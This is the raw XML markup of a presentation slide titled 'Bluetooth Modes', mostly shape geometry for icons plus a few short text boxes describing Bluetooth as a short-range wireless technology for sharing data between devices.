              <a:gd name="connsiteX34" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY34" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX35" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY35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4352925" h="7243169">
                <a:moveTo>
                  <a:pt x="0" y="6843025"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4352925" y="6843025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352925" y="7243169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7243169"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="5562601"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4352925" y="5562601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352925" y="5654664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352925" y="5810574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352925" y="6843023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6843023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5810574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5654664"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2176463" y="918990"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1499163" y="918990"/>
                  <a:pt x="950103" y="1468049"/>
                  <a:pt x="950103" y="2145348"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="950103" y="2822647"/>
                  <a:pt x="1499163" y="3371706"/>
                  <a:pt x="2176463" y="3371706"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2853762" y="3371706"/>
                  <a:pt x="3402822" y="2822647"/>
                  <a:pt x="3402822" y="2145348"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3402822" y="1468049"/>
                  <a:pt x="2853762" y="918990"/>
                  <a:pt x="2176463" y="918990"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2176464" y="815759"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2910777" y="815759"/>
                  <a:pt x="3506056" y="1411037"/>
                  <a:pt x="3506056" y="2145349"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3506056" y="2879663"/>
                  <a:pt x="2910777" y="3474941"/>
                  <a:pt x="2176464" y="3474941"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1442152" y="3474941"/>
                  <a:pt x="846873" y="2879663"/>
                  <a:pt x="846873" y="2145349"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="846873" y="1411037"/>
                  <a:pt x="1442152" y="815759"/>
                  <a:pt x="2176464" y="815759"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2176463" y="741790"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1401299" y="741790"/>
                  <a:pt x="772904" y="1370184"/>
                  <a:pt x="772904" y="2145348"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="772904" y="2920512"/>
                  <a:pt x="1401299" y="3548906"/>
                  <a:pt x="2176463" y="3548906"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2951627" y="3548906"/>
                  <a:pt x="3580022" y="2920512"/>
                  <a:pt x="3580022" y="2145348"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3580022" y="1370184"/>
                  <a:pt x="2951627" y="741790"/>
                  <a:pt x="2176463" y="741790"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2176461" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3378489" y="0"/>
                  <a:pt x="4352924" y="974435"/>
                  <a:pt x="4352924" y="2176463"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4352924" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352925" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352925" y="5562600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5562600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2176437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11237" y="1953932"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="122693" y="856437"/>
                  <a:pt x="1049561" y="0"/>
                  <a:pt x="2176461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8" name="Полилиния 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{430C894B-9FB1-49A1-ABE9-23CD1619D02E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4026529" y="1368664"/>
            <a:ext cx="3220006" cy="5200436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  <a:gd name="connsiteX7" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY7" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX8" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY8" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX9" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY9" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX10" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY10" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX11" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY11" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX12" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY12" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX13" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY13" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX14" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY14" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX15" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY15" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX16" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY16" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX17" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY17" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX18" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY18" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX19" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY19" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX20" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY20" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX21" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY21" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX22" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY22" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX23" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY23" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX24" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY24" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX25" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY25" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX26" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY26" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX27" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY27" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX28" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY28" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX29" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY29" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX30" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY30" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX31" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY31" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX32" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY32" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX33" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY33" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX34" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY34" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX35" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY35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4352927" h="7243169">
                <a:moveTo>
                  <a:pt x="0" y="6843025"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4352925" y="6843025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352925" y="7243169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7243169"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="5562601"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4352927" y="5562601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352927" y="5810574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352925" y="5810574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352925" y="6843023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6843023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5654664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="5654664"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2176465" y="918990"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1499165" y="918990"/>
                  <a:pt x="950105" y="1468049"/>
                  <a:pt x="950105" y="2145348"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="950105" y="2822647"/>
                  <a:pt x="1499165" y="3371706"/>
                  <a:pt x="2176465" y="3371706"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2853764" y="3371706"/>
                  <a:pt x="3402824" y="2822647"/>
                  <a:pt x="3402824" y="2145348"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3402824" y="1468049"/>
                  <a:pt x="2853764" y="918990"/>
                  <a:pt x="2176465" y="918990"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2176466" y="815759"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2910779" y="815759"/>
                  <a:pt x="3506058" y="1411037"/>
                  <a:pt x="3506058" y="2145349"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3506058" y="2879663"/>
                  <a:pt x="2910779" y="3474941"/>
                  <a:pt x="2176466" y="3474941"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1442154" y="3474941"/>
                  <a:pt x="846875" y="2879663"/>
                  <a:pt x="846875" y="2145349"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="846875" y="1411037"/>
                  <a:pt x="1442154" y="815759"/>
                  <a:pt x="2176466" y="815759"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2176465" y="741790"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1401301" y="741790"/>
                  <a:pt x="772906" y="1370184"/>
                  <a:pt x="772906" y="2145348"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="772906" y="2920512"/>
                  <a:pt x="1401301" y="3548906"/>
                  <a:pt x="2176465" y="3548906"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2951629" y="3548906"/>
                  <a:pt x="3580024" y="2920512"/>
                  <a:pt x="3580024" y="2145348"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3580024" y="1370184"/>
                  <a:pt x="2951629" y="741790"/>
                  <a:pt x="2176465" y="741790"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2176463" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3378491" y="0"/>
                  <a:pt x="4352926" y="974435"/>
                  <a:pt x="4352926" y="2176463"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4352926" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352927" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4352927" y="5562600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="5562600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2176437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11239" y="1953932"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="122695" y="856437"/>
                  <a:pt x="1049563" y="0"/>
                  <a:pt x="2176463" y="0"/>
                </a:cubicBez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2367CA6-0C95-490C-AE6F-8AC8B90D3B85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="4139754"/>
            <a:ext cx="3108383" cy="213904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6075" marR="0" lvl="0" indent="-346075" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Bluetooth is a short-range wireless communication technology that </a:t>
            </a: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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>replaces the cables connecting portable or fixed devices</a:t>
            </a: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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> while maintaining high levels of security.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A15BC664-62F5-4420-82D7-56F3861E4753}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4207730" y="3993560"/>
            <a:ext cx="2768635" cy="101566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6075" marR="0" lvl="0" indent="-346075" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1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allows devices to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share data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over short distances.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA99EB8A-3AE7-4DEE-ADF7-782322D257DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1651192" y="2393091"/>
            <a:ext cx="783074" cy="900828"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 226881 w 144"/>
              <a:gd name="T1" fmla="*/ 129977 h 256"/>
              <a:gd name="T2" fmla="*/ 226881 w 144"/>
              <a:gd name="T3" fmla="*/ 129977 h 256"/>
              <a:gd name="T4" fmla="*/ 150714 w 144"/>
              <a:gd name="T5" fmla="*/ 207963 h 256"/>
              <a:gd name="T6" fmla="*/ 226881 w 144"/>
              <a:gd name="T7" fmla="*/ 285948 h 256"/>
              <a:gd name="T8" fmla="*/ 233363 w 144"/>
              <a:gd name="T9" fmla="*/ 298946 h 256"/>
              <a:gd name="T10" fmla="*/ 226881 w 144"/>
              <a:gd name="T11" fmla="*/ 311944 h 256"/>
              <a:gd name="T12" fmla="*/ 129646 w 144"/>
              <a:gd name="T13" fmla="*/ 409426 h 256"/>
              <a:gd name="T14" fmla="*/ 116682 w 144"/>
              <a:gd name="T15" fmla="*/ 415925 h 256"/>
              <a:gd name="T16" fmla="*/ 97235 w 144"/>
              <a:gd name="T17" fmla="*/ 396429 h 256"/>
              <a:gd name="T18" fmla="*/ 97235 w 144"/>
              <a:gd name="T19" fmla="*/ 261578 h 256"/>
              <a:gd name="T20" fmla="*/ 32412 w 144"/>
              <a:gd name="T21" fmla="*/ 324941 h 256"/>
              <a:gd name="T22" fmla="*/ 19447 w 144"/>
              <a:gd name="T23" fmla="*/ 331440 h 256"/>
              <a:gd name="T24" fmla="*/ 0 w 144"/>
              <a:gd name="T25" fmla="*/ 311944 h 256"/>
              <a:gd name="T26" fmla="*/ 6482 w 144"/>
              <a:gd name="T27" fmla="*/ 298946 h 256"/>
              <a:gd name="T28" fmla="*/ 95614 w 144"/>
              <a:gd name="T29" fmla="*/ 207963 h 256"/>
              <a:gd name="T30" fmla="*/ 6482 w 144"/>
              <a:gd name="T31" fmla="*/ 116979 h 256"/>
              <a:gd name="T32" fmla="*/ 0 w 144"/>
              <a:gd name="T33" fmla="*/ 103981 h 256"/>
              <a:gd name="T34" fmla="*/ 19447 w 144"/>
              <a:gd name="T35" fmla="*/ 84485 h 256"/>
              <a:gd name="T36" fmla="*/ 32412 w 144"/>
              <a:gd name="T37" fmla="*/ 90984 h 256"/>
              <a:gd name="T38" fmla="*/ 97235 w 144"/>
              <a:gd name="T39" fmla="*/ 154347 h 256"/>
              <a:gd name="T40" fmla="*/ 97235 w 144"/>
              <a:gd name="T41" fmla="*/ 19496 h 256"/>
              <a:gd name="T42" fmla="*/ 116682 w 144"/>
              <a:gd name="T43" fmla="*/ 0 h 256"/>
              <a:gd name="T44" fmla="*/ 129646 w 144"/>
              <a:gd name="T45" fmla="*/ 6499 h 256"/>
              <a:gd name="T46" fmla="*/ 226881 w 144"/>
              <a:gd name="T47" fmla="*/ 103981 h 256"/>
              <a:gd name="T48" fmla="*/ 233363 w 144"/>
              <a:gd name="T49" fmla="*/ 116979 h 256"/>
              <a:gd name="T50" fmla="*/ 226881 w 144"/>
              <a:gd name="T51" fmla="*/ 129977 h 256"/>
              <a:gd name="T52" fmla="*/ 136128 w 144"/>
              <a:gd name="T53" fmla="*/ 349312 h 256"/>
              <a:gd name="T54" fmla="*/ 186366 w 144"/>
              <a:gd name="T55" fmla="*/ 298946 h 256"/>
              <a:gd name="T56" fmla="*/ 136128 w 144"/>
              <a:gd name="T57" fmla="*/ 248580 h 256"/>
              <a:gd name="T58" fmla="*/ 136128 w 144"/>
              <a:gd name="T59" fmla="*/ 349312 h 256"/>
              <a:gd name="T60" fmla="*/ 136128 w 144"/>
              <a:gd name="T61" fmla="*/ 66613 h 256"/>
              <a:gd name="T62" fmla="*/ 136128 w 144"/>
              <a:gd name="T63" fmla="*/ 167345 h 256"/>
              <a:gd name="T64" fmla="*/ 186366 w 144"/>
              <a:gd name="T65" fmla="*/ 116979 h 256"/>
              <a:gd name="T66" fmla="*/ 136128 w 144"/>
              <a:gd name="T67" fmla="*/ 66613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44" h="256">
                <a:moveTo>
                  <a:pt x="140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3" y="178"/>
                  <a:pt x="144" y="181"/>
                  <a:pt x="144" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="187"/>
                  <a:pt x="143" y="190"/>
                  <a:pt x="140" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78" y="255"/>
                  <a:pt x="75" y="256"/>
                  <a:pt x="72" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="256"/>
                  <a:pt x="60" y="251"/>
                  <a:pt x="60" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161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18" y="203"/>
                  <a:pt x="15" y="204"/>
                  <a:pt x="12" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="204"/>
                  <a:pt x="0" y="199"/>
                  <a:pt x="0" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="189"/>
                  <a:pt x="1" y="186"/>
                  <a:pt x="4" y="184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0"/>
                  <a:pt x="0" y="67"/>
                  <a:pt x="0" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="57"/>
                  <a:pt x="5" y="52"/>
                  <a:pt x="12" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="52"/>
                  <a:pt x="18" y="53"/>
                  <a:pt x="20" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95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75" y="0"/>
                  <a:pt x="78" y="1"/>
                  <a:pt x="80" y="4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3" y="66"/>
                  <a:pt x="144" y="69"/>
                  <a:pt x="144" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="75"/>
                  <a:pt x="143" y="78"/>
                  <a:pt x="140" y="80"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="84" y="215"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="215"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84" y="41"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="4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57" name="Freeform 142">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2C913A1-B041-4007-B5B0-2CB99DCEADBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5243327" y="2446716"/>
            <a:ext cx="817161" cy="869601"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 215652 w 64"/>
              <a:gd name="T1" fmla="*/ 75977 h 57"/>
              <a:gd name="T2" fmla="*/ 154037 w 64"/>
              <a:gd name="T3" fmla="*/ 138140 h 57"/>
              <a:gd name="T4" fmla="*/ 147191 w 64"/>
              <a:gd name="T5" fmla="*/ 141594 h 57"/>
              <a:gd name="T6" fmla="*/ 140345 w 64"/>
              <a:gd name="T7" fmla="*/ 131233 h 57"/>
              <a:gd name="T8" fmla="*/ 140345 w 64"/>
              <a:gd name="T9" fmla="*/ 100152 h 57"/>
              <a:gd name="T10" fmla="*/ 112961 w 64"/>
              <a:gd name="T11" fmla="*/ 100152 h 57"/>
              <a:gd name="T12" fmla="*/ 23961 w 64"/>
              <a:gd name="T13" fmla="*/ 169222 h 57"/>
              <a:gd name="T14" fmla="*/ 27384 w 64"/>
              <a:gd name="T15" fmla="*/ 186489 h 57"/>
              <a:gd name="T16" fmla="*/ 27384 w 64"/>
              <a:gd name="T17" fmla="*/ 193396 h 57"/>
              <a:gd name="T18" fmla="*/ 23961 w 64"/>
              <a:gd name="T19" fmla="*/ 196850 h 57"/>
              <a:gd name="T20" fmla="*/ 20538 w 64"/>
              <a:gd name="T21" fmla="*/ 193396 h 57"/>
              <a:gd name="T22" fmla="*/ 13692 w 64"/>
              <a:gd name="T23" fmla="*/ 183036 h 57"/>
              <a:gd name="T24" fmla="*/ 0 w 64"/>
              <a:gd name="T25" fmla="*/ 127780 h 57"/>
              <a:gd name="T26" fmla="*/ 6846 w 64"/>
              <a:gd name="T27" fmla="*/ 86338 h 57"/>
              <a:gd name="T28" fmla="*/ 112961 w 64"/>
              <a:gd name="T29" fmla="*/ 37989 h 57"/>
              <a:gd name="T30" fmla="*/ 140345 w 64"/>
              <a:gd name="T31" fmla="*/ 37989 h 57"/>
              <a:gd name="T32" fmla="*/ 140345 w 64"/>
              <a:gd name="T33" fmla="*/ 6907 h 57"/>
              <a:gd name="T34" fmla="*/ 147191 w 64"/>
              <a:gd name="T35" fmla="*/ 0 h 57"/>
              <a:gd name="T36" fmla="*/ 154037 w 64"/>
              <a:gd name="T37" fmla="*/ 0 h 57"/>
              <a:gd name="T38" fmla="*/ 215652 w 64"/>
              <a:gd name="T39" fmla="*/ 65617 h 57"/>
              <a:gd name="T40" fmla="*/ 219075 w 64"/>
              <a:gd name="T41" fmla="*/ 69070 h 57"/>
              <a:gd name="T42" fmla="*/ 215652 w 64"/>
              <a:gd name="T43" fmla="*/ 75977 h 57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7">
                <a:moveTo>
                  <a:pt x="63" y="22"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="41"/>
                  <a:pt x="44" y="41"/>
                  <a:pt x="43" y="41"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="41"/>
                  <a:pt x="41" y="40"/>
                  <a:pt x="41" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="29"/>
                  <a:pt x="41" y="29"/>
                  <a:pt x="41" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="29"/>
                  <a:pt x="33" y="29"/>
                  <a:pt x="33" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="29"/>
                  <a:pt x="7" y="32"/>
                  <a:pt x="7" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="51"/>
                  <a:pt x="7" y="52"/>
                  <a:pt x="8" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="54"/>
                  <a:pt x="8" y="55"/>
                  <a:pt x="8" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="56"/>
                  <a:pt x="7" y="57"/>
                  <a:pt x="7" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6" y="57"/>
                  <a:pt x="6" y="57"/>
                  <a:pt x="6" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="55"/>
                  <a:pt x="5" y="54"/>
                  <a:pt x="4" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2" y="49"/>
                  <a:pt x="0" y="42"/>
                  <a:pt x="0" y="37"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="33"/>
                  <a:pt x="0" y="29"/>
                  <a:pt x="2" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="13"/>
                  <a:pt x="21" y="11"/>
                  <a:pt x="33" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="11"/>
                  <a:pt x="41" y="11"/>
                  <a:pt x="41" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="2"/>
                  <a:pt x="41" y="2"/>
                  <a:pt x="41" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="1"/>
                  <a:pt x="42" y="0"/>
                  <a:pt x="43" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="0"/>
                  <a:pt x="44" y="0"/>
                  <a:pt x="45" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="19"/>
                  <a:pt x="63" y="19"/>
                  <a:pt x="63" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="19"/>
                  <a:pt x="64" y="20"/>
                  <a:pt x="64" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="21"/>
                  <a:pt x="63" y="21"/>
                  <a:pt x="63" y="22"/>
                </a:cubicBez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9061363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6E5F9F4-6356-40FD-8EC9-80FFE90A7F67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141414" y="158750"/>
            <a:ext cx="9764398" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p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Bluetooth Modes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741A8B9-D111-4091-90AF-865E3FFDB4CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
